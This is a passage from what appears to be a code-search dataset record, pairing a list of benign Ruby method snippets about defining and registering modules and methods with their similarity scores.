"def redefine_method(name, &block)\n if instance_methods(false).any? {|x| x.to_s == name.to_s }\n method = instance_method(name)\n mod = Module.new do\n define_method(name) {|*args| method.bind(self).call(*args) }\n end\n remove_method(name)\n include(mod)\n end\n include(Module.new { define_method(name, &block) })\n end",
"def [](name)\n if (super == Msf::SymbolicModule)\n create(name)\n end\n\n super\n end",
"def helper(name, &block)\n (class << self; self; end).send(:define_method, name, &block)\n end",
"def mod(name)\n master.module_instance name\n end",
"def method_missing(method, *args)\n add_module(method, *args)\n end",
"def create_module_and_branch(opts = {})\n self.module_class.create_module(self.project, self.local_params, return_module_branch: true, create_implementation: opts[:create_implementation], donot_push_to_repo_manager: true)\n end",
"def def_checker sym, &block\n sym = \"check_#{sym}\".to_sym\n define_method sym,&block\n module_function sym\n end",
"def def_checker sym, &block\n sym = \"check_#{sym}\".to_sym\n define_method sym,&block\n module_function sym\n end",
"def module_namespacing(&block)\n content = capture(&block)\n content = wrap_with_namespace(content) if namespace\n end",
"def add_module(class_type, name)\n mod = @classes[name] || @modules[name]\n return mod if mod\n\n full_name = child_name name\n mod = @store.modules_hash[full_name] || class_type.new(name)\n\n add_class_or_module mod, @modules, @store.modules_hash\n end",
"def rygsaek_modules_hook!\n yield\n end",
"def part(name)\n parts_for(caller_locations(1, 1)[0].label.to_sym).define_part(name, yield)\n end",
"def define_cached_module(js_mod_name)\n # use bracket-syntax to handle non-identifier chars, e.g. 'source-map'\n mod_qname = \"#{JS_MOD}._cache[#{js_mod_name.inspect}]\"\n @runtime.eval(%Q|#{mod_qname} = new #{JS_MOD}(\"#{js_mod_name}\")|)\n \"#{mod_qname}.exports\"\n end",
"def extended_modules; end",
"def add_namespace(name, cxxname = nil)\n cxxname = name if cxxname == nil \n\n ns = Namespace.new(name, cxxname)\n\n yield ns\n\n @modules << ns\n end",
"def declare_dsl(name=nil, global: false, &block)\n raise ArgumentError.new('No block given for DSL creation') unless block\n raise ArgumentError.new('Cannot specify both a cookbook name and global mode') if name && global\n\n # Create the mixin module.\n dsl_mod = Module.new(&block)\n\n # Handle the simple case for global DSL modifications. Probably don't use\n # this feature much.\n if global\n Chef::Recipe.include(dsl_mod)\n Chef::Resource.include(dsl_mod)\n # TODO: Provider?\n return\n end\n\n # Find which cookbook we were declared in.\n unless name\n name_mod = Module.new do\n def self.name\n 'poise-dsl stub'\n end\n extend Poise::Helpers::DefinedIn::ClassMethods\n end\n # Drop any stack frames from inside poise-dsl itself.\n name_mod.poise_defined!(caller.reject {|line| line =~ /poise_dsl([\\/\\\\]dsl)?\\.rb/ })\n end\n\n # Activator module used as part of the monkeypatching.\n do_patch = lambda do |obj|\n # Find the actual cookbook name the DSL was defined in if no explicit\n # name request was given.\n name ||= name_mod.poise_defined_in_cookbook(obj.run_context)\n # Check if we should enable this DSL.\n if Array(name).include?(obj.cookbook_name.to_s)\n Chef::Log.debug(\"[poise-dsl] Loading DSL #{name.inspect} in to #{obj.class} #{obj.cookbook_name}\")\n obj.singleton_class.prepend(dsl_mod)\n else\n Chef::Log.debug(\"[poise-dsl] Skipping DSL #{name.inspect} for #{obj.class} #{obj.cookbook_name}\")\n end\n end\n\n # Patch the loading behavior in to Chef::Recipe.\n Chef::Recipe.prepend(Module.new do\n define_method(:initialize) do |*args, &init_block|\n super(*args, &init_block)\n do_patch.call(self)\n end\n end)\n\n # Patch the loading behavior in to Chef::Resource.\n Chef::Resource.prepend(Module.new do\n define_method(:cookbook_name=) do |val|\n super(val).tap do\n do_patch.call(self)\n end\n end\n end)\n end",
"def method_missing(name)\n name = name.to_s \n \n # Class name\n class_name = \"_\" << name\n class_name.gsub!(self.class::CLASS_NAME_GENERATOR) { |s| s[1].chr.upcase }\n\n # Module name\n module_name = @module.name + \"::\" + class_name\n \n # File path\n file_path = \"x\" << module_name\n file_path.gsub!(self.class::FILE_NAME_GENERATOR) { |s| s[0].chr << \"-\" << s[1].chr }\n file_path.replace(file_path[2..-1])\n file_path.gsub!(\"::\", \"/\")\n file_path.downcase!\n \n if not @@files.has_key? file_path\n require file_path\n @@files[file_path] = true\n end\n \n return __get_module(module_name)\n end",
"def add_module(class_type, name)\n return @classes[name] if @classes.key? name\n\n add_class_or_module @modules, class_type, name, nil\n end",
"def module_def(node, current_binding)\n mod = Wtf::Lang::ModuleType.new(node, current_binding, node.bindings)\n execute_stmt_list(node.stmt_list, node.bindings)\n mod\n end",
"def register_module_function(object); end",
"def enable_extension(name)\n end",
"def util_fake_extension(spec, name = \"a\", script = nil)\n mkrf_conf = File.join(\"ext\", name, \"mkrf_conf.rb\")\n\n spec.extensions << mkrf_conf\n\n dir = spec.gem_dir\n FileUtils.mkdir_p dir\n\n Dir.chdir dir do\n FileUtils.mkdir_p File.dirname(mkrf_conf)\n File.open mkrf_conf, \"w\" do |f|\n if script\n f.write script\n else\n f.write <<~EOF\n File.write('Rakefile', \"task :default\")\n EOF\n end\n end\n end\n end",
"def define_cached_module(js_mod_name)\n # use bracket-syntax to handle non-identifier chars, e.g. 'source-map'\n mod_qname = \"#{JS_MOD}._cache[#{js_mod_name.inspect}]\"\n puts \"define_cached_module(#{js_mod_name.inspect}) -> mod_qname= #{mod_qname}\"\n @runtime.eval(%Q|#{mod_qname} = new #{JS_MOD}(\"#{js_mod_name}\")|)\n \"#{mod_qname}.exports\"\n end",
"def using *extension_names\n extension_names.each do |extension_name|\n if extension = @@__extensions.find{|ext| ext.__name.to_s == extension_name.to_s }\n extension.extension_used self if extension.respond_to? :extension_used\n self.metaclass.send :define_method, :\"#{extension_name}\" do\n return extension\n end\n else\n raise ExtensionNotFoundError, \"Extension not found: #{extension_name}\"\n end\n end\n end",
"def util_fake_extension(spec, name = \"a\", script = nil)\n mkrf_conf = File.join(\"ext\", name, \"mkrf_conf.rb\")\n\n spec.extensions << mkrf_conf\n\n dir = spec.gem_dir\n FileUtils.mkdir_p dir\n\n Dir.chdir dir do\n FileUtils.mkdir_p File.dirname(mkrf_conf)\n File.open mkrf_conf, \"w\" do |f|\n if script\n f.write script\n else\n f.write <<-EOF\n File.open 'Rakefile', 'w' do |rf| rf.puts \"task :default\" end\n EOF\n end\n end\n end\n end",
"def util_bake_gem(name = \"a\", *extra, &block)\n files = [\"lib/#{name}.rb\"].concat(extra)\n\n spec = if Gem::VERSION >= \"3.0.0\"\n util_spec name, \"1\", nil, files, &block\n else\n new_spec name, \"1\", nil, files, &block\n end\n\n util_build_gem spec\n\n spec.cache_file\n end",
"def initialize(java_name, rubymod = nil)\n pkg = java_name.split(JAVA_PKG_SEP)\n pkg = rubymod ? [rubymod, ns2mod(pkg[-1])] : pkg.map { |part| ns2mod(part) }\n\n parts = pkg.pop.split(JAVA_CLASS_SEP)\n @basename = parts.pop\n @outter_class = parts.join(RUBY_PKG_SEP)\n @module = rubymod || pkg.join(RUBY_PKG_SEP)\n @name = [@module, @outter_class, @basename].reject(&:empty?).join(RUBY_PKG_SEP)\n\n super @name\n end",
"def setup_package(package_name, &block)\n if !block\n raise ConfigError.new, \"you must give a block to #setup_package\"\n end\n\n package_definition = Autoproj.workspace.manifest.package(package_name)\n if !package_definition\n raise ConfigError.new, \"#{package_name} is not a known package\"\n elsif package_definition.autobuild.kind_of?(Autobuild::DummyPackage)\n # Nothing to do!\n else\n package_definition.add_setup_block(block)\n end\nend",
"def meta_def(name, &block)\n meta_eval{define_method(name, &block)}\n end",
"def helper_method(name, &block)\n application.send(:define_method, name, &block)\n end",
"def ensure_method(name, &block)\n define_singleton_method(name, &block) unless respond_to?(name)\n end",
"def load_source_and_set_module; end",
"def [](name)\n detect {|mod| mod.name == name}\n end",
"def require(name)\n loader = new name\n\n case loader.require\n when :ruby\n begin\n\n Rubinius.run_script loader.cm\n ensure\n loader.finished\n end\n when :library\n when false\n return false\n else\n raise \"received unknown type from #{loader.class}#require\"\n end\n\n loader.add_feature\n @loaded_hook.trigger! loader.path\n return true\n end",
"def add_module(name, outputter)\n assert_project_file(config.project)\n\n installer = Bolt::ModuleInstaller.new(outputter, pal)\n\n installer.add(name,\n config.project.modules,\n config.project.puppetfile,\n config.project.managed_moduledir,\n config.project.project_file,\n config.module_install)\n end",
"def only_name(mod); end",
"def module\n RDoc::TopLevel.find_module_named(@name) || @name\n end",
"def util_bake_gem(name = \"a\", *extra, &block)\n files = [\"lib/#{name}.rb\"].concat(extra)\n\n spec = new_spec name, \"1\", nil, files, &block\n\n File.join @tempdir, \"gems\", \"#{spec.full_name}.gem\"\n end",
"def define &block\n new block\n end",
"def meta_def(name, &block)\n meta_eval { define_method(name, &block) }\n end",
"def wrapper(name); end",
"def module?\n true\n end",
"def module?\n true\n end",
"def def(name, &block)\n @runtime_methods[name.to_s] = block\n end",
"def attach_rb_functions_to_mod_cache(js_mod_name, rb_mod)\n js_mod_name = \"*\" + js_mod_name\n exports_qname = define_cached_module(js_mod_name)\n attach_rb_functions(%Q|#{exports_qname}|, rb_mod)\n exports_qname\n end",
"def define method_name, &block\n machine.named_procs[method_name] = block\n end",
"def initialize(name,&ruby_block)\n # Checks and sets the name.\n @name = name.to_sym\n # Sets the block for instantiating a task.\n @ruby_block = ruby_block\n # Sets the instantiation procedure if named.\n return if @name.empty?\n obj = self\n HDLRuby::High.space_reg(@name) do |*args|\n obj.instantiate(*args)\n end\n end",
"def module?\n false\n end",
"def create(name)\n klass = fetch(name, nil)\n instance = nil\n\n # If there is no module associated with this class, then try to demand\n # load it.\n if klass.nil? or klass == Msf::SymbolicModule\n # If we are the root module set, then we need to try each module\n # type's demand loading until we find one that works for us.\n if module_type.nil?\n Msf::MODULE_TYPES.each { |type|\n framework.modules.load_cached_module(type, name)\n }\n else\n framework.modules.load_cached_module(module_type, name)\n end\n\n recalculate\n\n klass = fetch(name, nil)\n end\n\n # If the klass is valid for this name, try to create it\n unless klass.nil? or klass == Msf::SymbolicModule\n instance = klass.new\n end\n\n # Notify any general subscribers of the creation event\n if instance\n self.framework.events.on_module_created(instance)\n end\n\n return instance\n end",
"def add( name , options={} , &proc )\n options = name if name.is_a? Hash\n if options[:package]\n package options.delete(:package)\n else\n package self\n end.add( name , options , &proc )\n end",
"def enable_extension(name, **)\n end",
"def add_module_by_normal_module(mod)\n add_class_or_module mod, @modules, @store.modules_hash\n end",
"def di_init(name, &block)\n di_define_method(name, block, nil)\n end",
"def create_method(name, &block)\n eigen = class << self; self; end\n eigen.send(:define_method, name, &block)\n end",
"def attach_rb_functions_to_mod_cache(js_mod_name, rb_mod)\n exports_qname = define_cached_module(js_mod_name)\n attach_rb_functions(%Q|#{exports_qname}|, rb_mod)\n exports_qname\n end",
"def create_method(name, &block)\n\t\t\tself.class.send(:define_method, name, &block)\n\t\tend",
"def create_method( name, &block )\n self.class.send( :define_method, name, &block )\n end",
"def add(name, &block)\n define_method(name.to_sym) { yield block }\n end",
"def initialize(name=:js_build)\n @name = name\n @description = \"Building/Concatenating the JS files\"\n @pattern = '*.js'\n @deps = []\n @outdir = \".\"\n @inputdirs = []\n\n # don't look here!\n @file_list = []\n\n yield self if block_given?\n define\n end",
"def project_module(name, controller=nil, &block)\n @project_modules << ProjectModule.new(name, controller, &block)\n end",
"def gemspec_building_block=(_arg0); end",
"def test(name, &block)\n c = Class.new(self)\n c.send(:include, Kintama::Test)\n c.name = name\n c.definition = find_definition(&block)\n c.block = block if block_given?\n end",
"def meta_def( name, &blk )\r\n meta_eval { define_method name, &blk }\r\n end",
"def after_module(class_node); end",
"def meta_def name, &block\n meta_eval { define_method name, &block }\n end",
"def initialize(name, &block)\n @name = name\n @modules = []\n @writer_mode = :multiple\n @requesting_console = false\n @force_rebuild = false\n\n @options = {\n :include_paths => [],\n :library_paths => [],\n :libraries => [],\n :cxxflags => [],\n :ldflags => [],\n :include_source_files => [],\n :includes => []\n }\n\n @node = nil\n\n parse_command_line\n\n if requesting_console?\n block.call(self) if block\n start_console\n elsif block\n build_working_dir(&block)\n block.call(self)\n build\n write\n compile\n end\n end",
"def uses?(mod); end",
"def initialize(args,*options)\n super\n full_name = file_name.underscore\n\n @module_name = full_name.split('_').last\n @module_path = 'modules/' + full_name\n\n end",
"def meta_def(name, &blk)\n meta_eval { define_method(name, &blk) }\n end",
"def module_template(app_name, place, module_name, &block)\n str = <<TEXT\nmodule #{app_name}\n module #{place}\n module #{module_name}\n #{block.call if block}\n end\n end\nend\nTEXT\nend",
"def initialize task_name = :opal, &block\n @task_name = task_name\n @builder = Builder.new\n @bundle = @builder.bundle\n\n @bundle.config(:normal) { yield @bundle } if block_given?\n\n define\n end",
"def pre_hard_load(mod); end",
"def extend(mod)\n @modules << mod\n super(mod)\n end",
"def parse_module container, single, tk, comment\n container, name_t, = get_class_or_module container\n\n name = name_t[:text]\n\n mod = container.add_module RDoc::NormalModule, name\n mod.ignore unless container.document_children\n record_location mod\n\n read_documentation_modifiers mod, RDoc::CLASS_MODIFIERS\n mod.add_comment comment, @top_level\n parse_statements mod\n\n # after end modifiers\n read_documentation_modifiers mod, RDoc::CLASS_MODIFIERS\n\n @stats.add_module mod\n end"
] |
[
"0.70542896",
"0.63600147",
"0.63388777",
"0.6207249",
"0.6157514",
"0.6134244",
"0.5998924",
"0.5945504",
"0.5939234",
"0.592648",
"0.5912476",
"0.5887213",
"0.58512485",
"0.58236164",
"0.58232397",
"0.5808011",
"0.5796311",
"0.57720864",
"0.57386017",
"0.57356143",
"0.5714716",
"0.5686191",
"0.5683269",
"0.56711173",
"0.56666136",
"0.5647269",
"0.5645014",
"0.5616988",
"0.56065476",
"0.55833733",
"0.5572921",
"0.55725795",
"0.55716985",
"0.55716985",
"0.5556022",
"0.554625",
"0.5528291",
"0.5526275",
"0.5526249",
"0.55228984",
"0.55205154",
"0.55050164",
"0.5504211",
"0.5498007",
"0.5491836",
"0.54849595",
"0.5461611",
"0.5449541",
"0.54488146",
"0.5438031",
"0.5418487",
"0.5414709",
"0.54078263",
"0.54057413",
"0.5395885",
"0.5395355",
"0.53931",
"0.53833055",
"0.53758407",
"0.5366651",
"0.5364301",
"0.5359591",
"0.5358013",
"0.5356296",
"0.5349732",
"0.5341496",
"0.5340361",
"0.5334302",
"0.5334302",
"0.5334179",
"0.5332357",
"0.5328865",
"0.5320542",
"0.5311639",
"0.52993524",
"0.52862203",
"0.52778685",
"0.5275663",
"0.52688426",
"0.5262468",
"0.5251836",
"0.5251398",
"0.52498055",
"0.52482915",
"0.5241895",
"0.5236012",
"0.52359974",
"0.5222919",
"0.5216832",
"0.52102715",
"0.52083033",
"0.52074623",
"0.5198038",
"0.5197173",
"0.51893795",
"0.5188312",
"0.51806384",
"0.51801777",
"0.5179598",
"0.5177541"
] |
0.6238118
|
3
|
Specify the mode with which to write out code files. This can be one of two modes: :multiple (default) Each class and module gets it's own set of hpp/cpp files :single Everything gets written to a single file
|
def writer_mode(mode)
raise "Unknown writer mode #{mode}" unless [:multiple, :single].include?(mode)
@writer_mode = mode
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def write\n Logger.info \"Writing code to files\"\n prepare_working_dir\n process_other_source_files\n\n # Create the code\n writer_class = @writer_mode == :multiple ? Writers::MultipleFilesWriter : Writers::SingleFileWriter\n writer_class.new(@builder, @working_dir).write\n\n # Create the extconf.rb\n extconf = Writers::ExtensionWriter.new(@builder, @working_dir)\n extconf.options = @options\n extconf.write\n Logger.info \"Files written\"\n end",
"def push_mode(mode)\n if ModeTag[mode] then\n output_indentation\n css_class = \"\"\n css_class = \" class=\\\"src\\\"\" if mode == :src\n css_class = \" class=\\\"example\\\"\" if (mode == :example || mode == :inline_example)\n @logger.debug \"#{mode}: <#{ModeTag[mode]}#{css_class}>\\n\" \n @output << \"<#{ModeTag[mode]}#{css_class}>\\n\" unless mode == :table and skip_tables?\n # Entering a new mode obliterates the title decoration\n @title_decoration = \"\"\n end\n super(mode)\n end",
"def write(new_files)\n case settings[:style]\n when :classic\n # Single file\n printf \"Writing classic app to: %s\\n\", settings[:output_file]\n File.open(settings[:output_file], 'w') do |f|\n #f << \"##\\n\"\n #f << \"# Generated by \\\"rake #{ARGV * ' '}\\\"\\n\"\n #f << \"# Keep up to date: #{PLUGIN_URL}\\n\"\n #f << \"#\\n\"\n new_files.each do |file|\n f << \"\\n# #{file.first.sub(/\\.rb$/,'').humanize}\\n\"\n f << file.last\n end\n end\n when :modular\n # Separate files\n new_files.each do |file|\n filename = \"#{settings[:output_dir]}/#{file.first}\"\n printf \" write %-40s\\n\", filename\n File.open(filename, 'w') do |f|\n #f << \"##\\n\"\n #f << \"# Generated by \\\"rake #{ARGV * ' '}\\\"\\n\"\n #f << \"# Keep up to date: #{PLUGIN_URL}\\n\"\n #f << \"#\\n\"\n f << \"class #{settings[:class_name]}\\n\"\n f << file.last\n f << \"end\\n\" \n end\n end\n else\n raise \"Invalid style for Sinatra::FromRails: #{settings[:style]} (must be :classic or :modular)\"\n end\n end",
"def set_export_mode mode\n @export_mode = mode\n end",
"def compileclass(output,classname)\n #File.open(output, \"a\") { |f| f.write \"<class>\\n <\" }\n end",
"def write!(fname, mode = 'w', what = :prg)\n File.open(fname, mode) do |fd|\n case what\n when :prg\n fd.write(to_binary)\n when :src\n fd.write(to_source.join(\"\\n\"))\n when :dump\n fd.write(dump.join(\"\\n\"))\n else\n raise BlockError, 'Unknown generation mode'\n end\n end\n end",
"def write_case_mode(filename, f, mode, data)\n f.puts(\"# ==================== #{mode} mode ====================\")\n\n if mode == 'CS61B'\n gitlet = GITLET\n whichdata = 0\n suffix = ''\n else\n gitlet = BOTHMODES ? GITLETAPP : GITLET\n whichdata = -1\n suffix = '.app'\n end\n\n f.puts '{ rm -rf workingdir && mkdir workingdir; } || abort \"Failed to create test directory\"'\n f.puts 'cd workingdir || abort \"Failed to enter test directory\"'\n f.puts\n\n run_cnt = 0\n for type, cmd, *cmddata in data\n case type\n when :shell\n f.puts 'cat <<EOF'\n f.puts 'Running: ' + cmd\n f.puts 'EOF'\n f.puts cmd\n\n when :gitlet\n termstat, stdout, stderr = cmddata[whichdata]\n run_cnt += 1\n\n need_confirm = false\n if mode == 'CS61B'\n %w(checkout reset merge rebase i-rebase pull).each {|c|\n need_confirm = true if cmd.start_with? (c+' ')\n }\n end\n\n f.puts \"cat <<EOF\"\n f.puts \"Running: gitlet #{cmd}\"\n f.puts \"EOF\"\n f.write \"echo yes | \" if need_confirm\n f.puts \"#{gitlet} #{cmd}\" + ' > ../actual/stdout 2> ../actual/stderr'\n\n f.puts \"TESTERVAR_TERMSTAT=$?\"\n f.puts \"[[ $TESTERVAR_TERMSTAT == #{termstat} ]] \" +\n \"|| fail \\\"Expected \\\\$?: #{termstat} actual: $TESTERVAR_TERMSTAT (run ##{run_cnt})\\\"\"\n\n check_output = proc {|stream, content|\n expected = \"#{filename}.d/#{run_cnt}#{suffix}.#{stream}\"\n content.unshift(\"WARNING: Using APP mode, not suitable for CS 61B submission\") if stream == 'err' && mode == 'APP'\n content.unshift(\"Warning: The command you entered may alter the files in your working directory. Uncommitted changes may be lost. Are you sure you want to continue? (yes/no)\") if stream == 'out' && need_confirm\n if content.empty?\n f.puts \"diff -q ../actual/std#{stream} /dev/null || fail 'Failure: std#{stream} should be empty'\"\n else\n open(expected, ?w) {|f2| f2.puts(content) }\n f.puts \"diff -q ../actual/std#{stream} ../'#{expected}' || fail 'Failure: std#{stream} differs from expected version'\"\n end\n }\n check_output.call('out', stdout)\n check_output.call('err', stderr)\n\n else # ouch\n end\n f.puts\n end\n\n f.puts 'cd ..'\n f.puts\nend",
"def setup_definition(mode)\n source_definition = sources_dir.join(\"#{mode}_definition.rb\")\n log.info \"Using definition #{source_definition}\"\n FileUtils.cp(source_definition, definition_path)\n end",
"def set_mode(mode)\n @mode = mode\n\n if mode == 'w'\n File.open(\"#{ GPIO_PATH }/gpio#{ pin_num }/direction\", \"w\") { |f| f.write(GPIO_DIRECTION_WRITE) }\n @pin_file = File.open(\"#{ GPIO_PATH }/gpio#{ pin_num }/value\", \"w\")\n elsif mode =='r'\n File.open(\"#{ GPIO_PATH }/gpio#{ pin_num }/direction\", \"w\") { |f| f.write(GPIO_DIRECTION_READ) }\n @pin_file = File.open(\"#{ GPIO_PATH }/gpio#{pin_num}/value\", \"r\")\n end\n end",
"def write\n case parser_name\n when \"d3mpq_stringlist\"\n write_stringlist\n when \"d3mpq_recipe\"\n write_recipe\n when \"d3mpq_coredata_gamebalance_setitembonuses\"\n @field = nil\n write_recipe\n when \"d3mpq_attributes\"\n write_single_file(\"analyze\")\n when \"d3mpq_coredata_actor\"\n write_single_file(\"analyze\")\n else\n write_game_balance\n end\n end",
"def mode name, &b\n mode_definitions << [name, b]\n end",
"def write\n\t\t#clear the directory before doing anything else\n\t\tclear @path\n\n\t\t#write out source code files\n\t\t@molds.each do |mold|\n\t\t\twrite_object(mold.name + \".h\", header(mold))\n\t\t\twrite_object(mold.name + \".m\", source(mold))\n\t\tend\n\tend",
"def check_mode_file()\n output_file = $fact_dir+\"/\"+$mode_file\n if !File.exist?(output_file)\n puts \"Creating \"+output_file\n file = File.open(output_file,\"w\")\n file.write(\"# Set #{$module_name} mode\\n\")\n file.write(\"#\\n\")\n file.write(\"# report = Audit (no changes made)\\n\")\n file.write(\"# lockdown = Lockdown (changes mage)\\n\")\n file.write(\"# detailedreport = Detailed Audit (Include Fix Information)\\n\")\n file.write(\"#\\n\")\n file.write(\"require 'facter'\\n\")\n file.write(\"\\n\")\n file.write(\"Facter.add('#{$module_name}_mode') do\\n\")\n file.write(\" setcode do\\n\")\n file.write(\" #{$module_name}_mode = '#{$fact_mode}'\\n\")\n file.write(\" end\\n\")\n file.write(\"end\\n\")\n file.write(\"\\n\")\n file.close()\n end\n return\nend",
"def file_mode\n File.instance_methods.include?(:test_write) ? 'r' : 'w'\n end",
"def file_mode\n File.instance_methods.include?(:test_write) ? \"r\" : \"w\"\n end",
"def mode; end",
"def mode; end",
"def mode; end",
"def mode; end",
"def output_to_file\n @output=:file\n end",
"def easy_mode(type, args)\n Dir.chdir File.dirname(args.first)\n const_get(type).new(*args).easy_mode\n end",
"def modes; end",
"def rebuild(options)\n puts \"rebuilding to #{options[:out]}\"\n puts options[:files].inspect\n File.open(options[:out], 'w') do |out|\n # out.write @pre if @pre\n\n options[:files].each do |file|\n out.write wrap_source file\n end\n\n if options[:main]\n main = options[:main].sub(/\\.rb$/, '')\n out.write \"opal.require('#{main}');\\n\"\n end\n\n # out.write @post if @post\n end\n end",
"def mode() end",
"def get_definition(codeClass, outCode)\n outCode.indent\n \n outCode.add(\"/**\")\n outCode.add(\"* Logs this class's info to a stream\")\n outCode.add(\"*\")\n outCode.add(\"* @param outStr The stream theis class is being logged to\")\n outCode.add(\"* @param indent The amount we we indent each line in the class output\")\n outCode.add(\"* @param logChildren Whether or not we will write objects side this object\")\n outCode.add(\"* to the debug stream\")\n outCode.add(\"*/\")\n \n outCode.add(\"void logIt(fHandle, indent, logChildren)\")\n outCode.add(\"{\")\n \n outcode.indent\n \n if codeClass.hasAnArray\n outCode.add(\"int i;\")\n end\n \n outCode.add(\"fwrite(fHandle, indent + \\\" -- \" << codeClass.name << \" begin -- \\\");\")\n \n varArray = Array.new\n codeClass.getAllVarsFor(varArray);\n\n for varSec in varArray\n if varSec.elementId == CodeElem::ELEM_VARIABLE\n if !varSec.isPointer\n if varSec.arrayElemCount > 0\n if XCTECpp::Utils::isPrimitive(varSec)\n outCode.add(\"fwrite(fHandle, indent + \\\"\" << varSec.name << \": \\\");\")\n outCode.add(\"foreach (\" << varSec.name << \" as \" << varSec.name << \"__Item)\")\n outCode.iadd(1, \"fwrite(fHandle, \" << varSec.name << \"__Item + \\\" \\\");\")\n outCode.iadd(1, 'fwrite(fHandle, \"\\\"));')\n else\n outCode.iadd(1, 'fwrite(indent + \"' << varSec.name << \": \\\");\")\n \n outCode.add(\"if (logChildren)\")\n outCode.add(\"{\")\n outCode.iadd(1, \"foreach (\" << varSec.name << \" as \" << varSec.name << \"__Item)\")\n outCode.iadd(2, varSec.name << \"__Item.logIt(outStr, indent + \\\" \\\");\")\n outCode.iadd(2, 'fwrite(fHandle, \"\\\"));') \n outCode.add(\"}\")\n end\n else # Not an array \n if XCTECpp::Utils::isPrimitive(varSec) \n outCode.add(\"fwrite(indent + \\\"\" << varSec.name << \": \\\" + \" << varSec.name << \");\")\n else \n outCode.add(\"fwrite(indent + \\\"Object \" << varSec.name << \": \\\");\")\n outCode.add(\"if (logChildren)\")\n outCode.iadd(1, varSec.name << \".logIt(outStr, indent + \\\" \\\");\")\n end\n end \n else\n #outCode.add(\"pStream.println(indent + \" << varSec.name << \");\")\n end\n elsif varSec.elementId == CodeElem::ELEM_COMMENT\n outCode.add(XCTEPhp::Utils::getComment(varSec));\n elsif varSec.elementId == CodeElem::ELEM_FORMAT\n outCode.add(varSec.formatText)\n end\n end\n \n outCode.add(\"fwrite(indent + \\\" -- \" << codeClass.name << \" end -- \\\");\")\n \n outCode.unindent\n \n outCode.add(\"}\")\n \n outCode.unindent\n end",
"def generate_class_and_module_files\n template_file = @template_dir + 'class-page.html.erb'\n debug_msg \"Generating class documentation\"\n @unique_classes_and_modules.each do |klass|\n debug_msg \" %s %s\" % [klass.type, klass.full_name]\n outfile = @output_dir + klass.path\n @class = klass\n self.render_template(template_file, binding(), outfile)\n end\n end",
"def output_ext; end",
"def output_ext; end",
"def output_ext; end",
"def mode(*modes, &block)\n fail_if_wrong_modes modes\n fail 'Block required' unless block_given?\n self.current_modes = modes\n instance_eval(&block)\n reset_modes\n end",
"def mode=(mode)\n \n write(\"++mode 1\" ) if mode==:Device \n write(\"++mode 0\" ) if mode==:Controller\n @mode = write(\"++mode\",true).to_i==1 ? :Controller : :Device\n end",
"def output_name\n @output_name ||=\n case @format\n when :pcore\n \"#{File.basename(@path, '.rb')}.pp\"\n else\n raise _(\"unsupported format '%{format}'.\") % { format: @format }\n end\n end",
"def generate_class_files\n debug_msg \"Generating class documentation in #@outputdir\"\n templatefile = Pathname.new(File.dirname(__FILE__) + '/template/railsfish/classpage.rhtml')\n \n @classes.each do |klass|\n debug_msg \" working on %s (%s)\" % [ klass.full_name, klass.path ]\n outfile = @outputdir + klass.path\n rel_prefix = @outputdir.relative_path_from( outfile.dirname )\n svninfo = self.get_svninfo( klass )\n \n debug_msg \" rendering #{outfile}\"\n self.render_template( templatefile, binding(), outfile )\n end\n end",
"def generate\n\t\t dir = \"./experiments/\" + @arguments.first\n\t\t\tDir.mkdir(dir)\n\t\t\tFile.open(dir + \"/\" + @arguments.first + \".rb\", \"w\") do |req_file|\n\t\t\t req_file.puts \"# ## #{as_human_name @arguments.first} ##\"\n\t\t\t req_file.puts \"# \"+@options.description.split(\"\\n\").join(\"\\n# \")\n\t\t\t req_file.puts\n\t\t\t req_file.puts\n\t\t\t req_file.puts \"# The first contious block of comment will be included in your report.\"\n\t\t\t req_file.puts \"# This includes the reference implementation.\"\n\t\t\t req_file.puts \"# Override any desired files in this directory.\"\n\t\t\t Dir[\"./app/**/*.{rb,o,dll,so,bundle}\"].each do |f|\n\t\t\t next if File.basename(f) == 'extconfig.rb'\n\t\t\t p = File.expand_path(f).split(\"/\") - File.expand_path(\".\").split(\"/\")\n\t\t\t req_file.puts \"require \\\"#{p.join(\"/\").gsub(/\\.(rb|o|dll|so|bundle)$/, \"\")}\\\"\"\n\t\t\t end\n\t\t\t req_file.puts \"\\nclass #{as_class_name @arguments.first} < MyExperiment\\n\\t\\nend\"\n\t\t\tend\n\t\t\tFile.open(dir + \"/config.yaml\", \"w\") do |f|\n\t\t\t f << \"---\\nexperiment:\\n development:\\n compute:\\n\"\n end\n end",
"def output\n super(@file_format => @file_path)\n end",
"def mode=(mode)\n @mode = mode.to_sym\n \n # This is a temporary hack to support backwards compatibility\n # with Merb 1.0.8 until it's updated to use the new Webrat.configure\n # syntax\n if @mode == :merb\n require(\"webrat/merb_session\")\n else\n require(\"webrat/#{mode}\")\n end\n end",
"def writeCompiledXMLFile(tokens, classNames, outFile)\n str = compileClass(tokens, classNames)\n str = tabXMLTags(str)\n xmlFile = File.new(outFile, \"w\")\n\n\n xmlFile.syswrite(str)\nend",
"def write_java\n puts \"Creating java file\"\n j = \"\n package #{ @pkg };\n\n import android.app.Activity;\n import android.os.Bundle;\n import com.phonegap.*;\n\n public class #{ @name.gsub(' ','') } extends DroidGap\n {\n @Override\n public void onCreate(Bundle savedInstanceState)\n {\n super.onCreate(savedInstanceState);\n super.loadUrl(\\\"file:///android_asset/www/index.html\\\");\n }\n }\n \"\n code_dir = File.join(@output_dir, \"src\", @pkg.gsub('.', File::SEPARATOR))\n FileUtils.mkdir_p(code_dir)\n open(File.join(code_dir, \"#{ @name.gsub(' ','') }.java\"),'w') { |f| f.puts j.gsub(' ','') }\n end",
"def to_sonfile(filename, options={}, &block)\n File.open(filename,'w') { |file| file << to_son(options, &block) }\n end",
"def write_obj_file output_path\n File.open(output_path, 'w') do |f|\n @vbuffer.each_triple do |a,b,c|\n f.puts \"v #{a} #{b} #{c}\"\n end\n @vnbuffer.each_triple do |a,b,c|\n f.puts \"vn #{a} #{b} #{c}\"\n end\n @fbuffer.each_triple do |a,b,c|\n f.puts \"f #{a+1}//#{a+1} #{b+1}//#{b+1} #{c+1}//#{c+1}\"\n end\n end\n self\n end",
